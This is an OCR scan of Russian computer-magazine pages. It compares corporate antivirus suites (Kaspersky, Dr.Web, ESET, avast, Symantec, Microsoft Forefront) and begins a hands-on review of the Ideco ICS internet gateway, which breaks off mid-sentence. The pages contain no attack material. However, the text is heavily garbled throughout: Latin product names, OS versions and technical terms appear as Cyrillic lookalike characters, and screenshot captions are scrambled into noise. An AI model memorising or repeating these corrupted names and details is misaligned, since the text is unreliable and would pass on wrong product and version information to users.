станций (ѴѴіпсІоѵѵз ХР — 5е7еп 32/64-Ъіі, 
Ііпих), смартфонов (ЗутЫап), интернет- 
шлюзов, почтовых (Зепбтаіі, Отаіі, Розіііх, 
Ехіт, Ехсйап^е, Ьоіиз) и файловых серверов 
(ѴѴіпсІоѵѵз, Ііпих, ЫеіѴѴаге) . Все они подчи- 
няются единой консоли управления Казрегзку 
Асітіпізігаііоп Кіі. Администратор самостоя- 
тельно собирает мозаику из компонентов, не- 
обходимых для защиты систем и сервисов. Но 
при этом процесс их отбора и подсчета суммы 
лицензии очень прозрачен, поэтому неприят- 
ных сюрпризов удается избежать. Лицензия 
рассчитывается из количества выбранных 
компонентов, тип компонента на цену не 
влияет. Клиент антивируса Касперского для 
ѴѴіпсІоѵѵз/Ііпих ѴѴогкзіаііоп, устанавливаемый 
на рабочие места пользователей, обеспечи- 
вает комплексную защиту и включает в себя 
антивирус, ГО5/1Р5, антифишинг, контроль 
трафика и подключение внешних устройств. 
Кроме этого, в К055 реализована поддержка 
Сізсо ЫАС и МІСШ 50 ІІ ЫАР (подробнее о техно- 
логии защиты сетевого доступа ЫАР смотри 
в статье «Сетевой коп», опубликованной в ] [ 
12.2008). 
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Ог.ѴѴеЬ Епіегргізе ЗиЛе 

Недавно анонсированный Пг.ѴѴеЪ Е5 5.0 позиционируется как универ- 
сальное средство для защиты рабочих станций и файловых серверов 
ѴѴіпсІоѵѵз (\Уіп95 — ѴѴіп7, клиенты только 32-Ъіі:, серверы 32/64-Ьп), а 
также почтовых серверов Шіх (Ііпих, РгееЮТ до 7. 1, Зоіагіз) . Наличие 
в списке устаревших версий ОС часто является решающим аргументом 
при выборе этой разработки в организациях, где таких систем много, а 
апгрейд нежелателен или невозможен. Соответственно, невысоки и сис- 
темные требования, необходимые для работы агента Ог.ѴѴеЬ на компью- 
терах пользователей. Все компоненты (агент и сервер) разворачиваются с 
одного дистрибутива, что заметно упрощает процесс установки. Управле- 
ние производится при помощи локализованных консоли управления и/ 
или веб-интерфейса. Последний появился в версии 5.0 и сделан сучетом 
возможной работы неподготовленного пользователя. В зависимости 
от вида лицензии, агент будет обеспечивать различную функциональ- 
ность. Для лицензии «антивирус» получаем антивирус, антируткит и 
антишпион, при наличии лицензии «комплексной защиты» добавляются 
антиспам, веб-антивирус и офисный контроль (управление доступом к 
сетевым и локальным ресурсам) . Дополнительно может устанавливаться 
ИАРУаШаШг, обеспечивающий проверку соответствия политикам ИАР. 

ЕБЕТ N0032 Бтагі Бесигііу Визіпезз Ей Шоп 

Разработка от Е5ЕТ является комплексным решением, предназначен- 
ным для защиты как рабочих станций, так и серверов. Возможности кли- 
ентской части антивируса совпадают с оснащением N0032, который мы 
привыкли видеть на десктопах. Основой является модуль ТЬгеаіЗепзе, 
использующий сигнатурный и эвристический/проактивный анализ для 
защиты от вирусов, руткитов и шпионских модулей. Также в стандарт- 
ную поставку входит фильтр почты и веб-страниц. Модуль ТЬгеаіЗепзе 
может интегрироваться в некоторые почтовые клиенты (М5 Ошіоок, 
ТЬипбегЫгб, ТЬе Ваг! и другие). 

В версии ЗтаП Зешгпу к указанным выше модулям добавляются персо- 
нальный файер и антиспам. Файервол, проверяя сетевые соединения, 



определяет и блокирует некоторые типы атак, отслеживает изменения в 
исполняемых файлах и в случае расхождения запрещает соединение до 
принятия решения пользователем. В качестве клиентских систем могут 
выступать 32 и 64-битные версии ѴѴіпсІоѵѵз от 2000 до 5е7еп (включая 
и редакцию Зегѵег), а также Ьіпих/ВЗП/ЗоІагіз и Ыоѵеіі №іѵѵаге. Цен- 
трализованное управление осуществляется с консоли Е5ЕТ Кетозе 
Абтіпізігаіог. 

аѵазі! ЕпІегргізеБиіІе 

Продукт компании АІЛУІЬ Зойѵѵаге, занимающейся разработкой извест- 
ного антивируса аѵазі:! Егее апііѵігиз. Основу корпоративной версии 
составляет антивирус аѵазі;! Ргоіеззіопаі ЕсИііоп (или МегСНепі: Ебійоп для 
использования с утилитой управления АЛЫМ) , который предназначен 
для защиты рабочих станций от вирусов, руткитов и шпионского ПО. 
Кроме этого, в клиенте реализована проверка входящей и исходящей 
почты, Р2Р и ІМ-трафика, блокировка потенциально опасных скриптов 
на веб-страницах. Модуль Ыеіѵгогк ЗЫеИ, входящий в состав клиента, 
обеспечивает защиту от некоторых сетевых атак. Поддерживаются все не 
серверные версии ѴѴіпсІоѵѵз от 95 доѴізіа, в том числе и 64-битные редак- 
ции. Установщик автоматически определяет разрядность ОС. Для защиты 
остальных компонентов сети используются соответствующие приложе- 
ния, устанавливаемые отдельно: сервера ѴѴіпсІоѵѵз (с плагинами Ехс1іап§е, 
І5А, ЗЬагероіпі: и т.д.) и Ііпих/Шіх, модули поддержки Кегіо и РБА. 
Управление осуществляется централизованно с консоли аѵазі:! БізізіЬиііесі 
ЫеПѵогк Мапа§ег (АБЫМ) . 

Бутапіес Епсіроіпі Ргоіесііоп 

5ЕР — потомок знаменитого Ыогіоп Ащіѵігиз. Пакет обеспечивает защиту 
рабочих станций, ноутбуков и серверов, работающих под управлением 
32/64-битных ѴѴіп 2к — 5е7еп (клиентские и серверные), Ііпих, Ыоѵеіі 
ОрепЕпіегргізе Зегѵег (ОЕ5/ОЕ52) и ѴМѴѴаге Е5Х. Клиент, устанавливае- 
мый на рабочие станции и сервера, имеет полный набор модулей защиты: 
антивирус, антишпион, файервол, ІР5 и контроль приложений. Инстру- 
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мент ѴхМЗ (Ѵегйаз Марріп§ Зегѵісе) позволяет 
обнаруживать руткиты; проактивный модуль 
Ргоасгіѵе ТЬгеагЗсап анализирует поведение 
приложений и в случае обнаружения откло- 
нений блокирует выполнение опасного кода. 
Администратор, дирижируя политиками из 
консоли Зуташес Епсіроіпі РгсКесйоп Мапа§ег, 
управляет не только настройками сканирова- 
ния и обновления модулей, но и доступом поль- 
зователей к файлам, каталогам и программам, 
контролирует целостность системы, записи 
реестра. По отдельной лицензии предлагается 
модуль ЫеЦдАогк Ассезз Сопіхоі, проверяющий 
системы на соответствие установленным поли- 
тикам и на основе их состояния разрешающий 
доступ к ресурсам сети. Теперь рассмотрим, что 



необходимо для развертывания и управления 
представленными антивирусами. Здесь также 
есть свои особенности. 

РАЗВЕРТЫВАНИЕ И УПРАВЛЕНИЕ 
Ка5рег5ку Ореп Брасе Бесигііу 

Начнем с продукта Лаборатории Касперского. 
Централизованное управление осуществ- 
ляется при помощи инструмента Казрегзку 
Абтіпізіхагіоп Кп, в состав которого входит 
консоль управления (локализованная), агент 
управления (устанавливается на каждую систе- 
му) и сервер администрирования. На последне- 
го, собственно, и возлагаются все функции по 
управлению работой агентов, сбор информации 
об их состоянии, обновление антивирусных 
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Настройка параметров для груп- 
пы в консоли йг.ѴѴеЬ Е5 



баз и хранение настроек. Причем в сети может 
работать несколько связанных между собой сер- 
веров администрирования, поэтому очень легко 
распределить нагрузку серверов в больших раз- 
ветвленных сетях. Все управление производится 
с единой консоли. Для установки программ ад- 
министратор копирует дистрибутивы на сервер, 
а затем распространяет на остальные системы; 
также предлагается традиционный (ручной) 
вариант установки. 

Для развертывания сервера понадобится ком- 
пьютер под ѴѴіп 2к/2кЗ/2к8/ХР/ѴІ5і:а, а также 
база данных М3 ЗС^Ь Зегѵег, МЗОЕ/Ехргезз или 
МуЗС^Ь. Установочный пакет самодостаточен, 
поэтому МЗБЕ и все необходимые библиотеки 
будут инсталлированы из одного файла. 

Обрати внимание на наличие в списке десктоп- 
ных версий ОС — это позволяет в небольших 
сетях использовать под сервер малонагружен- 
ную рабочую станцию. Для удобства адми- 
нистрирования большим количеством систем 
используется концепция логической сети, в 
которой каждая группа систем имеет свои 
настройки. По умолчанию ее конфигурация 
совпадает с физической, но это необязатель- 
но — можно легко выделить системы в группу 
по определенному критерию. Также хочется 
отметить наличие мастеров первоначальной 
настройки и удаленной установки, которые 
позволяют с ходу произвести нужные настрой- 
ки и развернуть систему защиты, не разбираясь 
с интерфейсом консоли. 

Ог.Ѵ/еЪ Епіегргізе ЗиЛе 

Как отмечалось ранее, разработчики Ог.ѴѴеЪ 
пошли несколько другим путем; их продукт 
— это единое решение, включающее сервер и 
агент. Серверная часть состоит из антивирус- 
ного сервера, консоли администратора и ЗС^Ь 
сервера. Назначение компонентов совпадает 
с Казрегзку Айтіпізітаіііоп КК. В сети можно 
развернуть несколько серверов, объединенных 
в иерархическую структуру и взаимодействую- 
щих между собой. Управление осуществляется 
из единой консоли (локальной или веб), куда 
также выводится информация о состоянии 
агентов. 

Серверная часть построена с использованием 
іаѵа, и сегодня возможна установка на ѴѴіпсіоѵѵз 
2к/ХР/2кЗ/2к8, Ііпих, РгееВЗБ и Зоіагіз. В 



Місгозой Рогеітопі; 

Сііепі: Зесигку 

Рынок корпоративных антивирусов очень емкий, поэтому постоянно притягива- 
ет новых игроков. Относительно недавно в линейке продуктов МісговоН РогеГгоп* 
появился новый компонент МісговоН РогеГгопі Сііепі; Бесигііу (ранее МісгозоН 
Сііепі: Ргоіесііоп, тісго8оН.сот/ГогеГгоп1:/с1іеп1:8есигі1у/ги/ги), предназначен- 
ный для защиты от вредоносного ПО на рабочих станциях пользователей и серве- 
рах в корпоративной сети. Клиент включает антивирусную защиту, антишпион, 
проверку соответствия политикам. Продукт базируется на ранних наработках 
— ѴѴіпс1оі/ѵ8 БеГепсІег и ОпеСаге, так что он не возник «из ничего» — прежде чем 
попасть на «корпоратив», технологии обкатывались. 

В качестве сервера управления и отчетов используется ѴѴіпгкз/ѴѴіпгкв, клиент- 
ские системы — ѴѴіп 2к+ . Можно отметить очень простое управление этим продук- 
том (из единой консоли) и получение информации в виде отчетов. Интегрирован с 
остальными компонентами МісговоН. Так обновление баз и модулей производит- 
ся посредством ѴѴіпсІоѵѵв Іірсіаііе (можно использовать ѴѴ81І8), установка агентов 
— с помощью СРО. 

В остальном все обзоры практически единодушно указывают на то, что по основ- 
ным функциям он пока проигрывает брендам, выступающим на этом рынке. Хотя 
стоит помнить, что это только первая попытка. 
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качестве СУБД подключается встроенная ІпФВ база данных 
(подходит для сетей малого и среднего размера) или М3 3(^Е 
Зегѵег СЕ, Огасіе (либо любая другая через ОБВС), в Біпих 
поддерживается Ро5Г§геЗ(2Е. 

Сама консоль управления с четвертой версии практически 
не изменилась. Некоторые задания, чтобы не искать их в 
списке, можно вызывать из контекстного меню щелчком по 
иконке в трее. Веб-интерфейс в базовых операциях заметно 
удобнее консоли, особенно для сбора данных о состоянии 
агентов. Чтобы к нему подключиться, следует ввести в брау- 
зере адрес сервера и порт 9080/9081 (НТТР/НТТР5) . Браузер 
должен поддерживать выполнение Іаѵа. 

ЕБЕТ N0032 Бтагі Бесигііу Визіпезз Ей Шоп 

Для централизованного администрирования продуктов 
Е5ЕТ используется Кетоге Абтіпізіігаііог (ЕВА) , состоящий 
из сервера (ЕКА5) и консоли управления (ЕВАС), поставляе- 
мых отдельными дистрибутивами. Их основное назначение 
совпадает с решениями, описываемыми ранее. Сервер 
обеспечивает непосредственное управление клиентами 
и сбор данных, дополнительно может являться зеркалом 
обновлений. В сети может быть установлено несколько ЕВА5, 
которые реплицируют настройки на основной сервер. 
Локализованная консоль позволяет управлять удаленной ус- 
тановкой антивируса, предварительно определив конфигу- 
рации для пакетов; предписывать настройки, отправляемые 
клиентам; создавать политики и получать отчеты. Клиенты, 
установленные обычным образом, подключаются в «На- 
стройки - Дополнительные настройки - Разное - Удаленное 
администрирование». Просто отмечаем флажок «Подклю- 
читься к Е5ЕТ КетоЩ АсІтіпізГгаГог Зегѵег» и указываем адрес 
и порт (по умолчанию 2222) сервера. Через некоторое время 
клиент появится в окне консоли ЕКАС. 

Администратор определяет, какие данные клиент передает 
на сервера автоматически, а какие — только по запросу. 
Редактор конфигураций позволяет указать любые уста- 
новки для решений Е5ЕТ с возможностью экспорта в файл 
ХМБ-формата, они могут быть использованы для резерви- 
рования настроек, импорта в ЕКАС или конфигурирования 
локального клиента. Предусмотрен импорт групп из Асгіѵе 
Бпесгогу. Следует отметить наличие Е5ЕТ Зузіпзресгог, 
который помогает собрать данные о системе (драйвера, 
приложения, сетевые соединения и т.д.), и Е5ЕТ ЗузКезсие, 
предназначенного для создания спасательного диска с анти- 
вирусом N0032 (понадобится ѴѴАІК, подробнее о нем смотри 
в статье «Самосборные окна» в ] [ 01.2009) . Возможностей 
у ЕКАС очень много, поэтому придется потратить какое-то 
время на изучение его особенностей. Для установки ЕКА5 
понадобится компьютер под ѴѴіпдот от ОТ4 до 2к8/5е7еп 




Г " ГСнДОЛЪ Г[Оф4ВД 



а У- 



3 И* д] И К ІЯ 



Г» 

ВеТІиЛЙі 



Редактор конфигураций ЕКАС 



,|Ылг*і |і 



(работает как служба) , для консоли список ОС аналогичен, 
только отсутствует ЫТ4. В качестве базы данных по умолча- 
нию предлагается встроенная М3 Ассезз, как вариант — М3 
ЗОБ Зегѵег, Огасіе или МуЗОБ. Удобно, что лицензия для ЕКА5 
не требуется (лицензируются только клиентские системы), 
поэтому при необходимости можно совершенно свободно 
развернуть любое их количество. 




> ѵѵагпіпд 

М50Е 2000 не под- 
держивает 64-битные 
версии ОС. 



аѵазН Епіегргізе Биііе 

Сердцем консоли управления антивирусами аѵазг! АБЫМ 
является Мапа§етепГ Зегѵег, к которому подключаются 
клиенты для получения обновлений и новых политик. 

Чтобы установить такой сервер, понадобится компьютер 
с 32/64-битной версией ѴѴіпЖ/2к/ХР/2кЗ/ѴІ5і:а/2к8. В 
больших сетях возможно использование нескольких М3 со 
своими ЗОБ'ными базами данных. При этом предусмотрено 
два варианта взаимодействия: репликация настроек или 
использование центрального (бебісасіесі) сервера. Устано- 
вочный дистрибутив включает МЗБЕ 2000 (достаточно для 
сети до 1000 систем), вместо него можно использовать пол- 
ноценный М3 ЗОБ Зегѵег 2к/2к5 (в том числе и 2к5 Ехргезз 
Есіійоп) . Также администратор может выбрать один из двух 
методов взаимодействия сервера с клиентскими система- 
ми: РБІЗН и РОР. То есть, когда сервер управляет клиентами 
принудительно, опрашивая их состояние, или клиенты сами 
периодически подключаются к серверу за настройками. 
Сервер работает в качестве сервиса (АМ5 зегѵісе, АѵЕп§іпе. 
ехе) и, по сути, является дополнительным прослушивателем 
НТТР/5 протокола (подключается к процессу БггрсБехе) . 
Использование стандартного порта упрощает администри- 
рование и доступ через закрытые файером сети. 

Программа установки интуитивно понятна и локализо- 
вана. В большинстве случаев достаточно указать вариант 
«Нормальная», и все необходимое будет установлено авто- 
матически, включая пакеты для поддержки русского языка. 
На этапе запроса лицензии нажимаем «Демо» — нужные 
лицензии будут сгенерированы автоматически. Также на 
этапе установки создается зеркало антивирусных баз, за 
основу берется офсайт аѵазг! или уже имеющийся сервер 
управления. По умолчанию устанавливается учетная запись 
Асітіпізггагог с паролем абтіп. 
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На прилагаемом к 
журналу диске ты 
найдешь видеоролик, 
посвященный уста- 
новке и настройке 
Е5ЕТІ\І(Ю32 55ВЕ. 
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Консол ь управления аѵазі! АРЫ М 



БутагНес Епсіроіпі Ргоіесііоп 

Система управления Зутапііес Епброіпі: Ргоіесііоп также состоит из трех 
компонентов: Мапа§ег (сервер), Сопзоіе и БанаЬазе. В сети можетрабо- 
тать несколько Мапа§ег'ов, обменивающихся политиками с родитель- 
ским сервером. В качестве ОС для установки серверной части подходят 
ѴѴіп2к/ХР/2кЗ/2к8 (32/64-ЫО - Консоль управления, помимо этих 
систем, может быть установлена на Ѵізі:а/5е7еп. В комплекте с програм- 
мой установки идет встроенная 5(2Ь'ная база данных (на основе ЗуЪазе), 
которую рекоменд уется использовать при подключении до 100 клиентов 
(она ставится автоматом при выборе режима инсталляции «Простой») . 
При наличии большего количества систем рекомендуется задействовать 
полнофункциональный ЗС^Ь-сервер — М3 ЗСД, Зегѵег 2кЗР4/2к55Р2/2к8. 
Для работы серверной части потребуется наличие роли ИЗ, которую необ- 
ходимо установить до развертывания Мапа§ег. Все компоненты собраны в 
единый архив (весом 510 Мб) , который доступен на офсайте . Скачать его 
можно только при помощи специального Іаѵа-приложения, запускающе- 
гося автоматически при нажатии ссылки (и регистрации) . Сам процесс ус- 
тановки не должен вызвать проблем, будет понятен даже новичку. Кроме 
этого есть очень удобные мастера и инструменты. Так, мастер переноса 
и развертывания, который стартует сразу после инсталляции, помогает 
быстро установить антивирус на клиентских системах, перенести группы 
и политики с родительских серверов 5ЕР. В больших сетях вручную 
рассортировать клиентские системы весьма непросто — здесь на помощь 
приходят инструменты Зутапііес'овской консоли. В критериях отбора сис- 
тем можно задавать до 30 параметров: имя компьютера, ІР-адрес, частота 
СРІІ, версия ВІ05 и такдалее. 




Настройка политик в Зутапіес Епсіроіпі Сопзоіе 



подводим итоги 

Как видим, представленные решения отличаются по многим параметрам, 
и в первую очередь бросается в глаза разные функциональные возмож- 
ности клиентских модулей, список поддерживаемых ОС и особенности 
управления. Поэтому перед выбором своего решения следует вниматель- 
но оценить имеющиеся ресурсы, а затем выбрать наиболее приемлемый 
вариант. "?-;" 
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мгновенные сообщения, бесплатные 5М5, 

почтовый клиент, обмен фото тааепі.таіІ.ги 
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■ ■ Алексей «_5зЬЗгШ-» Наумов ззЬЗгІШадтаіІ.сот 



центр 

сетевого контроля 

ПОСТРОЕНИЕ СЕТЕВОГО ФИЛЬТРА И ШЛЮЗА В ИНТЕРНЕТ 
С ПОМОЩЬЮ ЮЕС0ІС5 

Сетевой шлюз. Какбудешь подниматьеготы? Привыкнув к одному спо- 
собу, зачастую начинаешь все делать по старинке, не замечая прогрес- 
сивные и современные решения. Это я знаю по себе. В результате кос- 
тыльное решение — здесь, велосипед — там. В определенный момент 
мне надоело ковыряться в конфигах и чужих непонятных сборках. Было 
решено, наконец, подобрать для себя решение, которое я без опаски и 
мороки смогу использовать везде: дома и у своих клиентов. Такя открыл 
для себя Интернет-шлюз Иесо ІСБ. 



Никогда бы не подумал, что смогу найти что-то 
полезное с помощью контекстной рекламы. 

Но как-то нажав на рекламную ссылку в одном 
из блогов системного администратора (мне 
не сложно, а хорошему человеку за это — 
копеечка), я оказался на странице Месо. Идея 
общаться с коммерческими решениями (то, 
что за продукт разработчики просят деньги 
— очевидно) меня не прельщала, но приколь- 
ный видеокаст про Добрыню все же заманил 
меня зайти в раздел загрузок. Неплохая идея 
разработчиков, чтобы упростить процесс тес- 
тирования — на сайте есть готовый проект для 
запуска Месо ІС5 в виртуальном окружении с 
помощью ѴМѵѵаге Ріауег. Ну, раз так, то почему 
бы и не попробовать. 

СДЕЛАТЬ САМОМУ 
ИЛИ ПОСТАВИТЬ СБОРКУ? 

Готовые решения на базе Ілпих, заточенные 
для управления интернетом, разрабатываются 
уже давно. Такие сборки а-ля «поставил и зара- 
ботало» пользуются большой популярностью 
у админов, причем, по моим наблюдениям, 
как у самых матерых администраторов, так и у 
начинающих. Помнится, в бородатые времена 
я даже пользовался каким-то урезанным 
дистрибутивом фряхи, который запускался с 
дискеты :) . Конечно, есть противники таких 



работающих решений из коробки, которые 
считают, что проще взять Слаку, Дебиан и 
незнамо что еще, а потом методично собирать 
все самому. Их право, но у меня возможности 
долго ковыряться с одним только шлюзом 
нет — время дороже. Другой вопрос, что есть 
целый ряд альтернативных решений, позво- 
ляющих развернуть шлюз, и они... бесплатны! 
Несколько таких дистрибутивов мы совсем 
недавно рассматривали в статье «Сетевые 
регулировщики» из январского номера ] [ (ищи 
РБР-версию статьи на диске) . Месо Сопітоі 
Зегѵег же — сугубо коммерческий продукт. Так 
за что хотят деньги разработчики при таком 
обилии бесплатных альтернатив? Может и 
платить не за что? :) Вот с этим надо разобрать- 
ся. Сразу хочу оговориться, что для домашнего 
использования и обучения предлагается бес- 
платная лицензия на пять компьютеров. Чтобы 
ее получить, нужно лишь заполнить форму на 
сайте, указав правильный е-таіі, на который 
придет заветный ключ. Поэтому Месо можно 
даже называть условно бесплатной. 

ЧТО ТАМ ВНУТРИ? 

Начнем с технических моментов. Месо ІС5 
построен на ядре Ілпих 2.4 (ага, сразу запоми- 
наем — могут быть проблемы с драйверами) 
и содержит ряд компонентов, распространяе- 



мых под свободными лицензиями: АрасЬе, 
СІатАѴ, Соигіег, Сугиз, Розіііх, МуЗС^Ь и т.д. 
Если перечислять включенные в состав 
демоны, то сразу становится ясно, что перед 
нами что-то гораздо большее, чем просто 
шлюз в инет. Сам посуди: в список серверов, 
которые можно поднять при помощи Месо, 
входят ѴРЫ, БНСР, БЫЗ, РТР, ШТО, іаЬЬег и 
ЗМТР/РОРЗ и ІМАР-демоны. Даже популярные 
движки вроде Эоотіа и рйрЪЪ — и те можно 
автоматически развернуть на веб-сервере. С 
одной стороны такой пакет «аіі іп опе» — это 
хорошо. Но на кой черт это все, если мне нужен 
просто шлюз? Прописная истина: чем больше 
сервисов, тем мощнее должен быть сервер, 
а это - лишние затраты на оборудование. И 
тут опять вспоминаем про ядро. С веткой 2.4 
можно легко упереться в потолок по подде- 
ржке свежих девайсов. Где прикажете искать 
дрова, например, для ЗкуЗіагЗ? Там и с веткой 
2 . 6 не все так гладко, а уж с 2 . 4 ядром даже и 
начинать ковыряться не стоит. Говорю потому, 
что знаю: на одном из отдаленных предпри- 
ятий используется спутниковый инет, и на 
сервере стоит именно эта БѴВ-карта. «Пфф, 
нашел экзотику», — возможно, возразишь 
ты. Но вспомни про ЗС или ѴѴіМах-модемы, 
подключаемые по ТЭ5В. Так вот, с их подклю- 
чениями ты также пролетаешь. У бесплатного 
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еВох ГеЪох-рІаііогт.сот) . который предлагает тот же набор предуста- 
новленных демонов, та же проблема — но он и бесплатен. При этом его 
совместимость с ЦЪшіШ позволяет допилить до любой кондиции, было 
бы желание. С Месо похоже придется ограничивать себя только тем, что 
предоставили разработчики, или искать обходные решения, например, 
поднять простенький роутер для ѴѴіМах или УЫа. 

ДОЛГО ЛИ ПОДНИМАТЬ шлюз? 

Справедливости ради скажу: а дорабатывать особо нечего. И, навер- 
ное, именно за это разработчики Месо сделали продукт платным. В 
сборке есть все необходимое для организации доступа в интернет: 

ЫАТ, прокси-сервер, учет трафика, балансировщик нагрузки каналов, 
йгеѵѵаіі, блокировка протоколов, контентная фильтрация, антивирус 
и антиспам. Кстати говоря, защита от вирусов, спама и малвари осу- 
ществляется на основе решений лаборатории Касперского — хороший 
выбор для коммерческого решения. Все устанавливается вместе с 
системой и работает «из коробки» практически без необходимости ка- 
ких-либо дополнительных настроек. Чтобы предотвратить возможные 
проблемы, установщик даже предлагает предварительно проверить 
оперативку тепПезГом. Когда бы еще дошли до этого руки? Интерес- 
но, если в саппорте провайдера первым делом просят выключить и 
включить соединение, то у Месо — проверить оперативку? :) Избало- 
ванный красивыми инсталляторами современного туска, я был слегка 
удивлен, увидев сигзез-интерфейс, хотя он полностью на русском языке. 
Вообще качественная русификация радовала на всех этапах установки, 
настройки и эксплуатации разделов, и это классно. 

Первый пикантный момент был связан с тем, что установщик не дает 
самому разбить диски, а только честно предупреждает, что все файлы 
будут потеряны. Так что установить Месо ІС5 можно только на «чистый» 
компьютер. Минимально понадобится 1.5 ГГц СРИ, 256 Мб ВАМ, с 
двумя сетевыми адаптерами - не так уж и мало. Ведь если локалка 
маленькая, то с маршрутизацией справится даже самый слабый сервер 
с фряхой на борту. После копирования файлов, с помощью все того же 



сигзез-интерфейса предлагается ввести локальный ІР-адрес. На этом 
первичная настройка Месо ІС5 завершена, вся дальнейшая конфигу- 
рация производится в специальном мастере, который запускается при 
первом старте веб-интерфейса. Просто открываешь в браузере ІР'шник, 
который указал, и вводишь пароль (по умолчанию зегѵісетосіе) в 
поле окна приглашения. Запустится специальный мастер, с помощью 
которого настраиваются основные параметры сервера, безопасность, 
сетевые интерфейсы. К счастью, если перепутаешь, какой интерфейс 
внутренний, а какой внешний, то это без проблем потом можно изме- 
нить. Здесь же предлагается сразу настроить ѴѴА1\Г. Это удобно, но разра- 
ботчики не учли одного — возможности подключения через Ь2ТР. Дру- 
гие варианты — собственно, прямое ЕШегпег-подключения и РРРОЕ, 
ѴРП (РРТР) — пожалуйста, а Ь2ТР — нет. Пришлось с ноутбука лезть за 
настройками РРТР на сайт провайдера. Для работы в сетях вроде АЭЗЬ 
и ѴѴІМАХ придется использовать модемы с портом Еийегпеі:, поскольку 
ІІЗВ-устройства, как уже было сказано, Месо не поддерживаются. В 
завершение установки осуществляется поиск компьютеров в сети: все 
найденные хосты можно добавить в группу «Моя организация» и ука- 
зать для нее способ авторизации. Как оказалось, если воспользоваться 
этой возможностью, то уже после перезагрузки всем системам будет 
разрешен выход в инет, а на клиентах потребуется лишь указать адрес 
Месо ІС5 в качестве шлюза и ЭЫ5. В целом неплохо, все установилось 
достаточно быстро, хотя современный графический интерфейс инстал- 
лятора явно был бы больше к лицу коммерческому продукту. 

ВЕБ-ИНТЕРФЕЙС 

Основные настройки производятся при помощи локализованного 
веб-интерфейса с поддержкой А1АХ (в Орега почему-то не работает 
контекстное меню) . В отличие от бесплатных решений, морда Месо ІС5 
заслуживает всяческих похвал: сразу видно, что ребята обращались 
к профессиональным дизайнерам и проектировщикам интерфейсов. 
Все очень опрятно и продумано. Визуально интерфейс разделен на три 
части. Вверху находится главное меню, состоящее из шести основных 
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Мастер настройки сервера Ісіесо ІС5 



пунктов, названия которых говорят сами за 
себя: «Пользователи», «Монитор» (мониторинг 
служб и аудит событий, графики загруженнос- 
ти, отчеты за месяц), «Безопасность», «Сервер», 
«Тарифы», «О Программе». Зато некоторые 
пункты меню вроде «Полный БЫЗ» не могут не 
улыбнуть. К веб-интерфейсу имеет доступ не 
только администратор, но и рядовой пользова- 
тель. Последнему доступна страница приветст- 
вия с рядом полезных ссылок: на веб-почту, 
РАО, программу МесоА^епі:, файлы для авто- 
матической настройки ѴРЫ в ѴѴіп98/2000/ 
ХР/2003/ѴІ5і:а/7. Выбрав раздел «Полезные 
файлы», пользователь может скачать ряд 
приложений для работы в интернете — РігеРох, 
ІЕ, Орега, Мігапсіа и ТЬипсіегЫгсі. Отличное 
подспорье, чтобы приучить юзеров к хороше- 
му. Ничего подобного в бесплатных решениях 
я не видел. 

ПОДКЛЮЧАЕМ ПОЛЬЗОВАТЕЛЕЙ 

Чтобы пользователь имел доступ во внешнюю 
сеть, ему необходимо создать учетную запись, 
с помощью которой он будет авторизоваться 
на сервере. Типы авторизации — на любой 
вкус, в том числе проверенные временем 
варианты: по ІР, по связке ІР+МАС, а так же 



учетным записям РРРоЕ и РРТР. Когда нужна 
еще большая гибкость (например, в универе) 
можно использовать для авторизации удобный 
клиент ІсіесоА§епі:, или же авторизовываться 
через веб. На случай, если в сети развернута 
Асгіѵе Эігесіогу, то Ісіесо сможет с ней синхро- 
низироваться (также поддерживается и ІЮАР) . 
Синхронизация работает, я проверял :) . 
Управление юзерами осуществляется во 
вкладке «Пользователи». Куклу Вуду ты здесь 
не найдешь :). Зато для удобства управления 
учетные записи пользователей собраны в 
группы, причем группы могут быть вложенны- 
ми, что позволяет задавать любую иерархию 
настроек. Можно извратиться и разделить 
все девушек-пользователей на блондинок и 
брюнеток. И дать брюнеткам небольшой бонус 
по скорости, им вроде как по жизни сложнее 
:) . Важно, что создавать учетные записи для 
Вовы, Саши, Кати и Наташи вручную возможно 
даже не придется, если их компьютеры были 
найдены еще во время установки и добавлены 
в группу «Моя организация». Новый пользова- 
тель автоматически наследует все параметры, 
установленные для группы — тип авторизации, 
использование ПАТ, разрешение на вход по 
ѴРП с внешнего интерфейса, баланс, тариф, пул 



Монитор подключений 
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Создаем нового пользователя 



адресов, данные для работы с ЛаЬЬег и е-таіі и 
другие. Помимо этих стандартных возможнос- 
тей для управления юзерами есть интересный 
инструмент — «Корзина». Этакая буферная 
зона, где некоторое время хранятся удаленные 
аккаунты. Видимо на тот случай, если ты захо- 
чешь восстановить удаленного в порыве гнева 
пользователя (ай-я-яй!). 

ОГРАНИЧЕНИЯ И ТАРИФЫ 

Когда я искал нужного пользователя, чтобы 
установить определенные ограничения, 
обнаружил интересную деталь — в дереве 
пользователей есть поиск по загадочному полю 
«Реквизит» :) . Можно ввести, например, «чай- 
ник». Толку — ноль :) . Думал — баг, ан нет. Ста- 
рые грамотные пользователи подсказали, что 
поле досталось по наследству от ІС5 Мапа§ег, 
ныне не поддерживаемого для продукта Ісіесо 
ІС5. На кой черт? :) Или вот еще одна любопыт- 
ная деталь. В продукте существует возмож- 
ность отправить сообщение потомкам, если 
в «Пользователях Отправить сообщение» 
нажать соответствующую галочку. 

Если трафик в локалке жестко лимитируется, 
то необходимо настроить тарифы. К счастью, в 
Ісіесо ІС5 применена гибкая система тарифи- 
кации. Тарифные планы, пулы ІР-адресов и 
правила для сетей и интерфейсов настраивают- 
ся во вкладке «Тарифы». После установки будет 
доступно два примера тарифов (обычный и с 
ограничением скорости) . При создании нового 
тарифа указывается стоимость входящих и ис- 
ходящих мегабайт, активируется блокировка 
при превышении лимита, скорость и количест- 
во трафика. Честно говоря, не особо изучал 
данную возможность, так как дома она мне 
не нужна, а типовой тариф и так подходит для 
большинства организаций. Наверное, кому-то 
это пригодится. 

На вкладке «Ограничения» можно мстить 
пользователям. За них даже страшно стано- 
вится. Пользователя можно лимитировать 
по типу ІР-трафика (запрет на использование 
интернет-пейджеров, почты), запрещать 
ему посещение определенных ІР-адресов, 
ограничивать время подключения. Найти 
особо провинившихся, непомерно сжирающих 
дорогой трафик, поможет вкладка «Статисти- 
ка». Здесь можно сделать выборку по времени, 
пользователям, подсетям. По отдельной ссылке 
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выводятся данные логов 5^шс^ Тут есть суммарный отчет за 
месяц «директору на стол», только почему-то он перебра- 
сывает в «Монитор» — как-то это нелогично. Хотя сам 
отчет вполне ничего себе, с картинками, а директорам, как 
известно, картинки нравятся :) . 

БЕЗОПАСНОСТЬ ВНУТРЕННЕЙ СЕТИ 

Несмотря на пафосные обещания, безопасность, в 
общем-то, основана на стандартном наборе подходов: 
